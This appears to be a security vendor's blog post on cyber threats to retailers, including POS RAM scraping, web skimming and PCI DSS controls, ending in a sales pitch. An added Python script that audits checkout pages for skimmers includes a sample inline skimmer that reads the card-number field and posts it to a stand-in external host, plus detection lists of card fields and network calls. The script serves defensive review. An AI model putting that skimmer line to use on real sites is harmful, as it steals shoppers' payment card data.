The annual losses the retail industry sustains due to organized cybercrime are stunning. A recent research report estimates that retail cybercrime costs the industry an eye-watering $30 billion annually. This number is split across a number of sub-sectors, including in-store retail, consumer products manufacturing, online retail, consumer services, and food and beverage.
Retailers are threat actors' top targets, beating out most other industries. Why is that?
First, most employees working for retailers lack awareness of cyber threats. The retail industry ranks last in recognizing and stopping social engineering attacks, making it very easy for cybercriminals to fool employees with phishing emails. Because retail typically employs more young and inexperienced people than most other industries, its employees are more likely to fall victim.
It doesn't help that many small retailers still fail to comply with PCI DSS (Payment Card Industry Data Security Standard) requirements when handling credit card transactions. They fail to do so even though there are stiff financial penalties for non-compliance.
Despite being early to adopt cloud storage for their data, only 27% of retailers encrypt the data when they put it in the cloud. A 2018 report highlighted the fact that more than half of retailers had experienced some sort of data breach in the past twelve months - an increase of 20% from the previous year. As a result of all of the above, the retail industry is suffering from a crisis of confidence as repeated breaches impact customer loyalty. In a recent survey, 19% of consumers said that they would take their business to another retailer after a breach. A further 35% said that they would take a break from shopping if their credit cards were stolen by cybercriminals following a data breach.
Cybercriminals primarily target the retail industry in two ways. The most common kind of cybercrime against the industry comes in cyberattacks aimed at POS (point-of-sale) systems using retail-specific malware. The malware is designed to record and exfiltrate credit and debit card data from the POS systems as transactions occur.
Retail POS systems are attractive to cybercriminals because of the sheer volume of transactions that pass through them. Plus, many retailers are still not leveraging end-to-end encryption on their terminals. However, cyberattacks against POS systems are dropping because the payments industry is increasingly forcing retailers to fulfill PCI compliance requirements and adopt EMV chip technology, which makes the card readers less vulnerable to attack. RAM scraping is still an issue for POS systems: because transaction data temporarily sits in the RAM of the POS system, special malware placed on the system is able to harvest those transaction and card details before they are deleted. The huge breach at retailer Target is a good example of this: hackers scraped transactions from thousands of customers and harvested their transactions and credit card information over a long period of time.
For online retailers, web skimming is an issue: hackers add malicious code to websites in order to harvest the credit card details of customers as they enter them into the site's payment page. This kind of attack can be hard to detect unless your business has a strong cybersecurity team that proactively reviews your website's source code, and because it can harvest the credit card data from hundreds of simultaneous shoppers, hackers are ramping up their efforts to infiltrate e-commerce sites with this kind of attack.
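As an added illustration of the source-code review mentioned above (example code, not Digital Hands' tooling), the following Python script inventories every script on a checkout page, flags external scripts served from origins outside a hypothetical allowlist, and shortlists inline scripts that both read card fields and make a network call. The allowlist, the sample page and the heuristics are constructed assumptions.

```python
"""Review aid for web skimming: inventory every <script> on a checkout page.
Added example, not Digital Hands' tooling; allowlist, sample page and heuristics are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: origins the retailer deliberately serves scripts from.
ALLOWED_ORIGINS = {"shop.example", "cdn.shop.example", "js.payments-provider.example"}
# Field names a card-harvesting script touches, and calls it would use to send them off-site.
# Crude heuristics meant to shortlist scripts for human review, not to convict them.
CARD_FIELDS = ("cardnumber", "cvv", "cvc", "expiry")
NETWORK_CALLS = ("fetch(", "xmlhttprequest", "sendbeacon(", "new image(")

# Constructed checkout page: first-party and payment-provider scripts, one unexpected
# third-party script, and an inline script that reads the card field and posts it off-site.
SAMPLE_CHECKOUT_HTML = """
<form><input id="cardNumber"><input id="cvv"></form>
<script src="/js/app.js"></script>
<script src="https://js.payments-provider.example/v1.js"></script>
<script src="https://unknown-cdn.example/analytics.js"></script>
<script>var n=document.getElementById("cardNumber").value;
fetch("https://unknown-cdn.example/c",{method:"POST",body:n});</script>"""

class ScriptCollector(HTMLParser):
    """Gather external script sources and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src: self.external.append(src)
            else: self.inline.append(""); self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script": self._in_script = False
    def handle_data(self, data):
        if self._in_script: self.inline[-1] += data  # body may arrive in chunks

def review_checkout_page(html, page_host, allowed=ALLOWED_ORIGINS):
    """Return (finding_kind, detail) pairs for scripts that deserve a human look."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname or page_host  # relative src => first party
        if host not in allowed:
            findings.append(("unexpected_external_script", src))
    for body in collector.inline:
        text = body.lower()
        if any(f in text for f in CARD_FIELDS) and any(c in text for c in NETWORK_CALLS):
            findings.append(("inline_script_reads_card_fields_and_calls_out", body.strip()[:60]))
    return findings
```

Run it against a fetched copy of your own payment page on a schedule and diff the findings against the previous run; a new entry is the signal worth a human look.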
Slim profit margins across the industry leave many retailers struggling to invest in robust cybersecurity measures. Further compounding this is the trend toward digital shopping experiences, which are essential to retailers struggling to compete. Digital shopping experiences require large investments in technology and cybersecurity because of the increase in data that digital shopping generates from loyalty programs and the customer profile data these programs store, data which must be protected from hackers.
Because any new adoption of technology almost always brings new cyber risks with it, the digital retail transformation is causing a lot of cybersecurity challenges, especially when retailers put IT before cybersecurity.
By now, most retailers are aware that they are going to have to invest in data privacy. Many are eyeing regulations like GDPR nervously without budgeting for the investment it will require to comply with these incoming regulations. GDPR requires businesses to be more diligent in the way they manage their customers' data and to facilitate customer access and deletion requests for that data, all of which requires the technology infrastructure to handle the requests.
The Digital Hands team assessed the industry and identified six key domains retailers need to focus on this coming year. Digital Hands is advising our retail customers to prioritize the following key objectives in line with the PCI DSS cybersecurity controls:
Protect Customers' Credit & Debit Card Data
Harden IT Infrastructure & Networks
Implement Strong Access & Authentication
Set Up a Program to Manage Vulnerabilities
Regularly Penetration Test Systems & Networks
Implement a Comprehensive Cybersecurity Policy
Digital Hands can help you with the effective implementation of many of these controls. In order to protect your customer data, you need to be monitoring your networks, firewalls, and data storage 24/7 to ensure that they are not being accessed by unauthorized personnel. To enable this proactive monitoring, you need staff on the ground working shifts to provide monitoring cover, and a SIEM to help you make sense of the log data and prioritize alerts for effective remediation. Typically these functions would be taken care of by an internal security operations center staffed with your own employees or by an external MSSP like Digital Hands, which operates multiple security operations centers in the US.
In addition to monitoring, we can help you implement strong access and authentication controls, penetration test your networks and infrastructure to ensure you are not exposed by any vulnerabilities in your infrastructure, and set up a program to manage those vulnerabilities and ensure they are properly remediated by well-trained information security professionals.
We also advise our retail customers to urgently migrate their systems and data to a secure infrastructure platform, implement training programs to teach their loss-prevention staff to recognize cyber threats, immediately encrypt their data at rest, and ensure that they are meeting cybersecurity best practices and regulatory mandates for the industry.
It is also important for large retailers to monitor dark web cybercrime forums where criminals trade vulnerabilities, pick their retail targets, and sell customers' credit card data.
This may seem like an enormous challenge for individual retailers, but retailers are pooling their resources and cybersecurity expertise in order to overcome these challenges. However, this is often hampered by the fact that the industry is highly competitive. Some retailers are unwilling to share cybersecurity resources and knowledge with others in case they reveal their weaknesses.
As with many industries that underinvest in cybersecurity measures, industry participants are playing a game of numbers. They are aware that they will rack up financial losses from cybercrime, but they are hoping that the losses stay within acceptable margins and do not become significant enough to cause major damage.
Digital Hands employs a deeply experienced team of cybersecurity professionals who can help your business get to grips with your cybersecurity risk exposure. We can help you implement controls, detection, and prevention systems to help you protect your organization and retail operations.
If you need a competent security services provider to ensure that you are making the right moves with security, get in touch with Digital Hands today via email (info@digitalhands.com) or by calling us at (813) 229-8324.
About Digital Hands: Recently ranked as one of the Top MSSPs in 2020, Digital Hands is a trusted global cybersecurity leader continuously taking action to protect our customers’ most valuable assets against relentless threats.
Digital Hands is proud to offer extensive security expertise and advanced monitoring and reporting capabilities. Our robust set of innovative cybersecurity services and solutions ensures your organization, customers and employees are defended against cybersecurity attacks and data breaches round the clock.
We are proactive in our response orchestration, which includes in-depth analysis and business context. Digital Hands enables our customers to harden their security posture, outmatch bad actors and benefit from our complementary white glove service and excellence in delivery. Our industry-leading customer retention rate and Net Promoter Score of 94 reflect how we go above and beyond every day for our customers.
References:
https://www.businessinsider.com/data-breaches-2018-4/?r=UK/#cheddars-scratch-kitchen-1
https://mashable.com/2018/04/04/every-store-retailer-hacked/